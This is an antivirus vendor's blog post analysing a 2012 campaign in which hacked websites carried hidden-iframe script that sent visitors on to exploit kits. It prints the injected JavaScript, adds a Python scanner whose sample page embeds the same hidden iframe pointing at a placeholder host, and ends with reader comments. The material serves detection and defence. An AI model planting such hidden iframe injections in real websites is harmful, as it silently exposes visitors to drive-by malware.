March 15th, 2012

Surprising hack found on multiple sites

From the “It-could-happen-to-you” file: We innocently clicked on a link which was promoted today on a trustworthy company’s Facebook page. To our surprise, avast! blocked it as a malicious URL.

When we attempted to open the URL, it was redirected to which triggered the blocking action. The only content on is one word – GOTCHA!

Senior virus analyst Jan Sirmer confirmed the attack when we couldn’t repeat the block. “The site,, was hacked for sure, and redirects to a black hole site,” he said. “Malicious script on the site is checking visitors’ cookies, which is the reason why you don’t see the warning more than once.”

He went on to explain, “We receive only one word: GOTCHA. It’s probably because the attackers are running the dumb site’s database with visiting IP addresses, and if they find this IP, only GOTCHA is returned. I think it helps them to be more secure from malware analysts and users looking into how they have been infected.”

After looking into the hack further, Sirmer discovered that the link to, or its variations, was injected into other legitimate sites too. Those links then led to malicious sites containing a black hole exploit kit.

Here is a list of some other dumb sites used as links in hacked legitimate websites:


Sirmer discovered that the malicious site is one of the malicious sites to which users were redirected from one of the dumb sites. It includes a well-known exploit pack called Crimepack. This exploit pack uses a Java vulnerability and silently downloads malicious Java, PDF and Flash files onto users’ computers.

In the last four days, Sirmer found that the bad guys injected a link to one of the dumb sites into 138 unique legitimate sites that were visited by avast! users. This is not such a huge number, but the attackers focused on sites like, which has lots of visitors.

An example of injected code:

    // The iframe URL was removed in the original post; it points at one of the "dumb" redirector sites.
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        // No <body> yet: write a 10x10 invisible iframe straight into the document.
        document.write("<iframe src='' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        // <body> exists: create the same hidden 10x10 iframe and append it.
        var f = document.createElement('iframe');
        f.setAttribute('src', '');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
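The injected snippet above has two tell-tale traits a site owner can search for in their own pages: an iframe that is invisible (visibility:hidden, or a 10x10 pixel box) and a script that builds the same kind of iframe dynamically with createElement/setAttribute. The following scanner is an added example written for this post, not code from avast! or from the analysis; it regex-scans saved HTML for both the static and the dynamic pattern and extracts the hosts the frames point to, so a webmaster who cannot get the block to trigger a second time (because of the cookie check described above) can still inspect a downloaded copy of the page. The sample page, the dumb-site.example domain and the /in.cgi?2 path in it are constructed placeholders; the real domains were redacted in the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample page mirroring the injected snippet from the post, with a
# placeholder domain (hypothetical) and one legitimate, visible iframe.
SAMPLE_PAGE = """<html><head><title>Legit site</title>
<script>
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
 document.write("<iframe src='http://dumb-site.example/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); }
function iframer() { var f = document.createElement('iframe');
 f.setAttribute('src', 'http://dumb-site.example/in.cgi?2');
 f.style.visibility = 'hidden'; f.style.position = 'absolute';
 f.setAttribute('width', '10'); f.setAttribute('height', '10');
 document.getElementsByTagName('body')[0].appendChild(f); }
</script></head><body>
<p>Welcome</p>
<iframe src="https://video.example/embed/abc" width="560" height="315"></iframe>
</body></html>"""

IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
CREATE_IFRAME = re.compile(r"""createElement\(\s*['"]iframe['"]\s*\)""", re.I)
SET_SRC = re.compile(r"""setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]*)['"]""", re.I)
SET_SIZE = re.compile(r"""setAttribute\(\s*['"](width|height)['"]\s*,\s*['"]?(\d+)""", re.I)
HIDDEN_CSS = re.compile(r"visibility\s*[:=]\s*['\"]?\s*hidden|display\s*[:=]\s*['\"]?\s*none", re.I)


def _px(value):
    """Leading integer of a width/height value ('10', '10px'), or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _tiny(width, height, limit):
    """True when both dimensions are present and at most `limit` pixels."""
    return width is not None and height is not None and width <= limit and height <= limit


def find_hidden_iframes(html, limit_px=10):
    """Return findings for iframes hidden via CSS or sized at most limit_px square.

    Static <iframe> tags are matched anywhere in the source, including inside
    document.write() strings; dynamic ones are inferred from createElement('iframe')
    plus hidden/tiny attributes in the same <script> block.
    """
    findings = []
    for m in IFRAME_TAG.finditer(html):
        attrs = {name.lower(): (dq or sq or bare) for name, dq, sq, bare in ATTR.findall(m.group(1))}
        reasons = []
        if HIDDEN_CSS.search(attrs.get("style", "")):
            reasons.append("hidden via CSS")
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if _tiny(w, h, limit_px):
            reasons.append("tiny %dx%d frame" % (w, h))
        if reasons:
            findings.append({"kind": "static", "src": attrs.get("src", ""), "reasons": reasons})
    for s in SCRIPT.finditer(html):
        script = s.group(1)
        if not CREATE_IFRAME.search(script):
            continue
        sizes = {name.lower(): int(v) for name, v in SET_SIZE.findall(script)}
        reasons = []
        if HIDDEN_CSS.search(script):
            reasons.append("hidden via CSS")
        if _tiny(sizes.get("width"), sizes.get("height"), limit_px):
            reasons.append("tiny %dx%d frame" % (sizes["width"], sizes["height"]))
        if reasons:
            src = SET_SRC.search(script)
            findings.append({"kind": "dynamic", "src": src.group(1) if src else "", "reasons": reasons})
    return findings


def suspicious_hosts(html):
    """Sorted, de-duplicated hostnames referenced by hidden iframes (for blocklists/IoC sharing)."""
    hosts = {urlparse(f["src"]).hostname for f in find_hidden_iframes(html) if f["src"]}
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f["kind"], f["src"], ", ".join(f["reasons"]))
    print("hosts:", suspicious_hosts(SAMPLE_PAGE))
```

Run it against a saved copy of a page (or the output of the site's own CMS templates) rather than against a live fetch: the redirector only behaves differently for visitors it has not seen, but the injected HTML is present in the source on every request. The visible 560x315 embed in the sample is deliberately not flagged, which is the check that keeps this from being noise on sites that legitimately embed video.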

An image of our first visit to


And the second visit. Images provided by avast! Virus Lab.


This image has been marked to show the redirection to

  • Tech

    Sirmer is always doing good, hard work…
    I’m jealous, because it’s difficult to get some info from him for the blog :)

  • sourov00

    Avast is the best Virus Scanner in the whole world……

    I love AVAST!!! :D

  • Jan Širmer

    Thanks for the compliment, Tech.
    I’ll try to improve my information sharing skills for next time :)

  • iGiedrius

    Hi, thanks for identifying the issue, any ideas how to solve this? I ran a scan on a number of other web security sites and none of them identify the site as suspicious. I deleted the post in question, so not sure if the hack was only on that post or on my server in general, as I can’t find any problems with any of the online tools.

    Social Media Citizens

  • iGiedrius

    Actually, I just downloaded your software and checked the copy of on my PC and it didn’t identify any threats either. Something really weird is happening.

  • Jan Širmer

    I’m trying to figure out how the bad guys injected those websites.
    Can you give me an answer to one question, please? Do you use a webkit?
    Thanks for the answer.

  • spg SCOTT

    I have seen this in.cgi?2 page before. It appeared quite a bit in the avast forum under the guise of js:Redirector-NT [Trj].

    The domain that it redirected to was not a constant, but the cgi page was.

    It appears that the script has changed somewhat, but I guess it still has the same effect.

  • iGiedrius

    No, I don’t use a webkit.